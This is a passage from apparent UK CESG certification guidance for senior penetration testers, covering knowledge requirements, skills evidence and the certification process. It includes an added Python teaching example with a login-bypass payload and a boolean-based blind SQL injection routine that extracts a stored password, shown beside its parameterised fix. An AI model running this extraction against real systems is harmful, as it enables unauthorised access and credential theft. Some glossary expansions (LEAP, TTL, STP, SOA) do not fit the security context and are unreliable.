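Note that a suite with no findings is still only as strong as the key exchange and certificate behind it, so the key-size check is reported alongside the cipher list rather than folded into it.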
Code Review – understands:
the techniques for identifying vulnerabilities in source code
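The script below is an added worked example serving the Injection, Blind SQL injection and Code Review requirements above; it is not part of the CESG guidance. It puts the injectable login (user input concatenated into the statement, the pattern a code reviewer looks for) beside its parameterised fix, shows the authentication bypass against the first and its failure against the second, and then drives a boolean-based blind extraction through the vulnerable login using only the success/failure bit. It runs against an in-memory SQLite table with constructed rows.

```python
"""Added example: the injectable login beside its parameterised fix, and a
boolean-based blind extraction against the vulnerable one. Uses an in-memory
SQLite table with constructed rows."""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
                     [("admin", "S3cret!Pass", "admin"), ("alice", "alice123", "user")])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """VULNERABLE ON PURPOSE: user input is concatenated into the SQL text.
    Returns the role on success, None on failure; that single bit is all a
    blind attack needs."""
    sql = (f"SELECT role FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username: str, password: str):
    """Bound parameters: the input can never alter the statement's structure."""
    row = conn.execute("SELECT role FROM users WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None


def make_oracle(conn):
    """Wrap the vulnerable login as a yes/no oracle for an arbitrary SQL condition.
    The payload closes the username literal, ANDs in the condition and comments
    out the password check with -- ."""
    def oracle(condition: str) -> bool:
        return login_vulnerable(conn, f"admin' AND {condition} --", "x") is not None
    return oracle


def blind_extract(oracle, column: str = "password", where: str = "username = 'admin'",
                  max_len: int = 64) -> str:
    """Boolean-based blind SQL injection: recover the length, then each character
    by binary search on its code point (about 7 probes per character instead of
    up to 95 guesses, which matters when each probe is an HTTP round trip)."""
    length_expr = f"(SELECT length({column}) FROM users WHERE {where})"
    length = next((n for n in range(1, max_len + 1) if oracle(f"{length_expr} = {n}")), 0)
    out = []
    for pos in range(1, length + 1):
        char_expr = f"(SELECT unicode(substr({column}, {pos}, 1)) FROM users WHERE {where})"
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"{char_expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    db = make_db()
    print("bypass:", login_vulnerable(db, "admin' --", "wrong"))   # admin
    print("fixed: ", login_fixed(db, "admin' --", "wrong"))        # None
    print("blind: ", blind_extract(make_oracle(db)))              # S3cret!Pass
```

The extraction loop is the same whether the oracle is a local function, an HTTP status code, a page-length difference or a response-time delay; only make_oracle() changes, which is why a report should treat any observable true/false difference as a full data-disclosure finding rather than a lesser one.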
Knowledge Requirements - Physical Access & Security
Locks – understands:
how locks can be used to restrict access to computer hardware
Tamper seals – understands:
how tamper seals can be used to deter access to computer hardware
Platform Integrity – understands:
platform integrity technologies, e.g. TPM
Boot Sequence – understands:
the BIOS boot sequence and how to obtain privileged access to an operating system by exploiting vulnerabilities in a boot sequence configuration, e.g. booting from removable media or enabling PXE boot
Disk Encryption – understands:
the security implications of unencrypted storage devices, such as hard disks
how to demonstrate how data can be recovered from unencrypted storage devices, and how such data can be manipulated to introduce vulnerabilities into an operating system
Recovery Functionality – understands:
the security attributes of operating system recovery functionality, e.g. Windows Recovery Console and Safe Mode
Multi-Factor Authentication – understands:
multi-factor authentication systems, such as tokens and SMS
Knowledge Requirements - Web Application Security Assessment
The knowledge requirements for Web Application Security Assessment apply to those who demonstrate this particular technical specialism within the wider Penetration Tester role. It is acknowledged that such a specialism may result in a penetration tester having a lesser understanding of the knowledge requirements detailed in the sections on Networking, Microsoft Windows Security Assessment and Unix Security Assessment. This is captured by the providers of the mandatory qualifications detailed within the role definition and need not be further explored by the Certification Body. The knowledge requirements for Web Application Security Assessment are defined in the OWASP Testing Guide v4. See http://www.owasp.org/ for further information and to obtain a copy of this guide. To avoid duplication, these requirements have not been repeated in this document; however, the mandatory sections to be included and the associated knowledge requirements are detailed below:
Section Title
4.2 Information Gathering
4.3 Configuration and Deployment Management Testing
4.4 Identity Management Testing
4.5 Authentication Testing
4.6 Authorisation Testing
4.7 Session Management Testing
4.8 Data Validation Testing
4.9 Error Handling
4.10 Cryptography
4.11 Logging
4.12 Business Logic Testing
4.13 Denial-of-Service
4.14 Web Service Testing
4.15 Client Side Testing
Skills
When presenting your skills evidence, use the ‘STAR’ format: ‘Situation, Task, Action, Result’
Use a narrative form, e.g. ‘... I produced ...My decision was...’
Explain what accreditation decision you made and how the measures you required were proportionate and effective
You must meet the required levels at all 4 core skills - (A2 Policy & Standards, D2 Security Testing, E3 Vulnerability Assessment, I3 Applied Research)
In addition to all the core skills, you must meet 75% of the non-core skills
A single piece of work may be used for several skills, but a variety of examples gives better evidence of being able to work in more than one situation.
The following table provides suggestions for starting points in evidence.
Technical Skills
SKILL / EVIDENCE OF SKILL
A1 – Governance Level 1
Understands local arrangements for Information Governance (IG)
Give examples of how your penetration testing was in accordance with the policies, processes and procedures of an organisation you’ve worked for, which were designed to protect information assets during and after penetration testing. Give an example of how a customer’s processes and controls affected the way you carried out penetration testing – e.g. a customer requested that you did not perform any exploitation.
A2 – Policy & Standards Level 1 – core skill
Understands the need for policy and standards to achieve Information Security (IS)
Give examples of:
your use of IS and other, non-technical, policies and standards. How did penetration testing fit within these requirements?
how you ensured that your penetration testing was in accordance with recognised methodologies, e.g. OWASP
A3 – Information Security Strategy Level 1
Understands the purpose of IS strategy to realise business benefits
Explain how in your experience local information security strategy has affected the technical security environment in a positive or negative way.
A4 – Innovation & Business Improvement Level 1
Is aware of the business benefits of good IS
How have risk mitigations which you have advised on benefitted the organisation (e.g. in terms of reduced costs/risk or more effective monitoring etc)?
A5 – IS Awareness & Training Level 1
Understands the role of security awareness and training in maintaining Information Security
Give examples where you have seen the effectiveness of security awareness programmes, for example whether they made an organisation more or less vulnerable to a successful social engineering attack.
A6 – Legal & Regulatory Environment Level 2
Understands applicable legislation and regulations relating to IS in the context of own or client organisations
Give examples from different work environments of how you ensured your work doesn’t contravene relevant statutes and how you explained this to customers. (For example, the Computer Misuse Act prohibits breaking into a system but the contract you were employed on might require or permit this). How did you report the types of material/breaches which you were required to and what were the results of this?
A7 – Third Party Management [1] Level 1
Is aware of the need for organisations to manage the information security of third parties
Give examples of any problems you’ve encountered when asked to review something out of scope in a third party system. How did you gain legitimate access? How did you describe the relevance of tests if you were not allowed to access relevant third party systems?
B1 – Risk Assessment Level 2
Understands how to produce information risk assessments
Describe how, as a result of penetration testing, you made an appropriate risk assessment and associated recommendations. What was the outcome of your work?
[1] Skill only required if information systems or services are provided by a third party
B2 – Risk Management Level 2
Contributes to management of risks to information systems with supervision
Give examples of how you worked with others to produce recommendations to improve information assurance.
C1 – Security Architecture Level 2
Applies architectural principles to security design with some supervision
Describe how you advised on IA architecture in the development cycle for information security systems. What was the outcome?
C2 – Secure Development Level 1 – Network Infrastructure Penetration Testing Specialist
Is aware of the benefits of addressing security during system development
Give examples from your experience of how security and secure development of products and systems were improved by penetration testing.
C2 – Secure Development Level 2 – Web Application Penetration Testing Specialist
Contributes to the development of secure systems with some supervision
Give examples of how secure development would have contributed to a better outcome from penetration testing. What examples of poor development standards have you come across? How could these have been improved?
D1 – IA Methodologies Level 1
Is aware of the existence of methodologies, processes and standards for providing Information Assurance
Give examples from your experience of appropriate and proportionate penetration testing. Give examples of standards, e.g. those required in the CHECK Scheme, and/or methodologies, and when these should be used.
D2 – Security Testing Level 2 – core skill
Effectively applies testing methodologies, tools or techniques with some supervision
Give examples from a range of work environments of:
the difference between vulnerability assessments and penetration tests you’ve carried out
testing methodologies - and instances when you developed new ones
test plans you developed and how you implemented them, or technical reports you wrote following security testing
E1 – Secure Operations Management Level 2
Monitors the application of Security Operating Procedures (SyOPs) with some supervision
Give examples of tests you’ve carried out to detect vulnerabilities. How did you ensure that operations were not impacted by the testing, and that alerts which were raised were not mistaken for an actual attack?
E2 – Secure Operations & Service Delivery Level 2
Effectively applies SyOPs with some supervision
Give examples of how you have influenced a customer to mitigate security risks. How did this affect monitoring and logging controls and escalation procedures? How was security improved?
E3 – Vulnerability Assessment Level 2 – core skill
Obtains and acts on vulnerability information in accordance with SyOPs
Give examples from different work environments of occasions when you identified vulnerabilities in a system or application. What tools and methodologies did you use and how did you make colleagues and/or customers aware of the vulnerabilities? What did you do to mitigate them and what was the outcome? What were the limitations of the vulnerability assessments compared with penetration testing? How often were vulnerability assessments done and was the frequency appropriate? How were the vulnerabilities used to mount exploits?
F1 – Incident Management Level 2
Contributes to security incident management
Give examples from a range of environments of how you recommended incident management procedures which met a client’s requirements. What role did post incident reviews and CERTs play in your recommendations?
F2 – Investigation Level 2
Contributes to investigations into security incidents
Give examples of how you contributed to security investigations, e.g. recommendations you made. How did you present your evidence and how would you recommend that evidence is preserved appropriately? How did you protect client information? How have you reported attacks you’ve discovered during testing and what recommendations did you make? What balance did you strike between recovery and the need for forensic evidence? What remedial actions ensured no further attacks?
F3 – Forensics Level 1
Is aware of the capability of forensics to support investigations
Give examples of:
malware you’ve detected – what testing did you carry out and what did you do with your results?
recovering information from logs, hard discs, etc. What tools and techniques did you use and what legislation or regulations did you have to follow? How did you remain in scope and legal whilst trying to track the perpetrator(s)?
G1 – Audit and Review Level 1
Understands basic techniques for testing compliance with security criteria (policies, standards, legal and regulatory requirements)
Give examples of how you’ve used your understanding of basic techniques for testing compliance with security criteria when developing or reviewing the scope of vulnerability testing.
H1 – Business Continuity Planning and H2 – Business Continuity Management Level 1
Understands how Business Continuity Planning & Management contributes to information security
Describe how you incorporated business continuity management into your vulnerability testing – e.g. out of hours testing, or sampling. How did you include business continuity in your advice on vulnerability mitigations and escalations? Give examples from different work environments to show how you tested whether traditional business continuity plans were fit for purpose in the context of cyber security incidents.
I3 – Applied Research Level 2 – core skill
Performs research activities under supervision
Give examples from different work environments of:
research papers you contributed to
research you’ve carried out – what was the purpose of this and what benefit did it provide?
PEOPLE SKILLS ‘J skills’ (instead of SFIA levels)
J1 – Teamwork and Leadership Level 2.5
Encourages & challenges others. Provides a lead across an organisation
Give examples of:
ways in which you provided a lead in helping teams or individuals to improve work processes. How did you address conflict if this arose?
J2 – Delivering Level 2.5
Responsible for ensuring delivery is achieved against a portfolio of business objectives, overcoming obstacles to achieve goals
Give examples of:
situations where you ensured that your team or colleagues maintained delivery in challenging circumstances. What did you do to facilitate timely and responsible delivery?
J3 – Managing Customer Relationships Level 2.5
Works with customers to ensure that their needs drive business plans
Give examples of ways you worked with customers to anticipate and positively influence their needs, so that business plans accommodated customer needs appropriately. This can include times when you negotiated satisfactory compromises
J4 – Corporate Behaviour Level 2.5
Takes action to achieve greater corporate efficiency, in line with strategic aims
Give examples of cost effective and proportionate proposals you’ve made to mitigate security vulnerabilities.
J5 – Change and Innovation Level 2.5
Contributes to change strategies and generates new ideas or approaches, going beyond the local area
Give examples of changes you introduced – what did you do, what techniques did you use and why? What were the outcomes and what would you do differently in the future? How did you consider the impact on other people and processes and try to find ways to acknowledge the opinions of others?
J6 – Analysis and Decision Making Level 2.5
Makes effective decisions and/or solves complex problems in uncertain situations, or where the impact is greater than in the immediate working area
Give examples from different environments of recommendations and solutions you produced where there was no clear process. What problems did you deal with and what was the result?
J7 – Communication and Knowledge Sharing Level 2.5
Is a persuasive communicator. Sets a lead in sharing knowledge effectively in diverse areas across the organisation
Give examples of how you adapted your communication to suit different media, including face to face, over the phone, emails, presentations and meetings to ensure timely and responsible disclosure, e.g.:
publishing reports
stand-up briefings
board presentations
risk escalation processes
participation in security working groups etc.
What were the outcomes?
Experience
Agree a plan with your manager to ensure that you cover the necessary ground, as suggested below.
Your evidence should show that you:
scope complex penetration tests which comply with relevant legislation and standards accurately and allocate resources for these
work autonomously and under general direction and deliver accurate technical results in accordance with a scope and test plan
carry out a broad range of penetration testing, following an analytical and systematic approach
create and execute tests to validate system or product security, applying your knowledge of configuration errors, vulnerabilities and coding flaws
communicate the outcomes and implications of penetration test results to colleagues and/or customers effectively, whether they are technical or non-technical in their knowledge and that you facilitate collaboration between stakeholders where necessary
deliver presentations, papers and reports which influence peers and customers
keep up to date with the latest developments in penetration testing and information security
engage in technical and/or professional development activities beyond your team and share and use that knowledge to improve the penetration testing service in your organisation
The Certification Process – next steps
This Application Guidance contains material designed to help individuals applying for Senior Practitioner Penetration Tester. The certification processes for the different CBs follow below. Note:
1. If you are considering applying for the Principal level, you will need to show wider experience of more complex systems and satisfy the requirement for higher specialist skill levels – see http://www.cesg.gov.uk/awarenesstraining/certified-professionals/Pages/index.aspx. Consultancy experience would also be appropriate.
2. If you are considering applying for the Lead level, you will need to show that you influence and direct the penetration testing function at an organisational or inter-organisational level and satisfy the requirement for higher specialist skill levels. For example, you directly and regularly brief or advise a Directors’ Board in this regard. See http://www.cesg.gov.uk/awarenesstraining/certified-professionals/Pages/index.aspx.
3. There are 3 CBs: the APM Group (www.apmg-ia.com), BCS, The Chartered Institute for IT (www.bcs.org) and the IISP, RHUL & CREST Consortium (www.iisp.org). Certification is for 3 years and requires evidence of continuing professional development throughout the period of certification.
[Flowchart: Senior Penetration Tester certification process – APMG. Entry qualifications: CREST Registered Pen Tester, Cyber Scheme Team Member, TIGER Scheme Qualified Security Tester, GCHQ Senior Pen Tester. Steps: apply online; written submission; personal evaluation; technical evaluation; interview; certification decision; end of certification process.]
[Flowchart: Senior Penetration Tester certification process – BCS. Entry qualifications: CREST Registered Pen Tester, Cyber Scheme Team Member, TIGER Scheme Qualified Security Tester, GCHQ Senior Pen Tester. Steps: apply online; written submission; assessment; interview; certification decision; end of certification process.]
[Flowchart: Senior Penetration Tester certification process – IISP. Entry qualifications: CREST Registered Pen Tester, Cyber Scheme Team Member, TIGER Scheme Qualified Security Tester, GCHQ Senior Pen Tester. Steps: apply online; written submission; assessment; interview; recommendation & certification decision; end of certification process.]
The CCP Scheme Certification Learning Cycle
If there is a gap against CCP requirements, make a time-bounded plan to develop skills and knowledge, with suitable opportunities to apply them
References
[a] CESG Certification for IA Professionals. Available from: http://www.cesg.gov.uk/awarenesstraining/certified-professionals/Pages/index.aspx
[b] Guidance to CESG Certification for IA Professionals. Available from: http://www.cesg.gov.uk/awarenesstraining/certified-professionals/Pages/index.aspx
Glossary
AES Advanced Encryption Standard
API Application Programming Interface
ARP Address Resolution Protocol
BGP Border Gateway Protocol
BIOS Basic Input Output System
CDP Cisco Discovery Protocol
CHECK IT Health Check Service
CNAME Canonical Name Record
CVSS Common Vulnerability Scoring System
DES Data Encryption Standard
DHCP Dynamic Host Configuration Protocol
DMZ Demilitarized Zone (firewall configuration)
DNS Domain Name System
EAP Extensible Authentication Protocol
EGP Exterior Gateway Protocol
EIGRP Enhanced Interior Gateway Routing Protocol
FTP File Transfer Protocol
GID Group Identifier
HINFO Host Information
HMACs Hashed MACs
HSRP Hot Standby Router Protocol
HTML Hyper Text Mark Up Language
HTTP Hypertext Transfer Protocol
HTTPS communications protocol for secure communication over a computer network
ICMP Internet Control Message Protocol
IGMP Internet Group Management Protocol
IGRP Interior Gateway Routing Protocol
IPSEC Internet Protocol Security
LEAP Programming language
LDAP Lightweight Directory Access Protocol
MACs Message Authentication Codes
MD5 Message Digest algorithm – cryptographic hash function
MIB Management Information Base
MX Mail Exchanges
NetBIOS Network Basic Input/Output System
NFS Network File System
NS Name Server (implements a name service protocol)
NTP Network Time Protocol
OSPF Open Shortest Path First
OWASP Open Web Application Security Project
PEAP Protected Extensible Authentication Protocol
PGP Pretty Good Privacy
PTR Pointer record
PXE Preboot execution environment
RIP Routing Information Protocol
RPC Remote Procedure Call
RSA public key cryptosystem (named after its authors)
SHA1 Secure Hash Algorithm – cryptographic hash function
SIP Session Initiation Protocol
SMTP Simple Mail Transfer Protocol
SNMP Simple Network Management Protocol
SOA Service Oriented Architecture
SOAP Simple Object Access Protocol
SQL Structured Query Language
SSH Secure Shell
SSL Secure Sockets Layer
STP Straight through Processing
SUID Set Owner User ID up
TACACS Terminal Access Controller Access-Control System Plus
TCP Transmission Control Protocol
TFTP Trivial File Transfer Protocol
TKIP Temporal Key Integrity Protocol
TPM Trusted Platform Module
TTL Transistor-Transistor Logic
TXT Text file
UDP User Datagram Protocol
UID User Identifier
URL Uniform Resource Locator
VOIP Voice Over Internet Protocol
VRRP Virtual Router Redundancy Protocol
VTP VLAN (Virtual Local Area Networks) Trunking Protocol
WEP Wired Equivalent Privacy
WPA Wifi-protected access
WSUS Windows Server Update Services
XML Extensible Mark Up Language
IA CESG, A2i, Hubble Road, Cheltenham, Gloucestershire GL51 0EX
Tel: +44 (0)1242 709141 Fax: +44 (0)1242 709193 Email: [email protected]
© Crown Copyright 2015. Communications on CESG telecommunications systems may be monitored or recorded to secure the effective operation of the system and for other lawful purposes.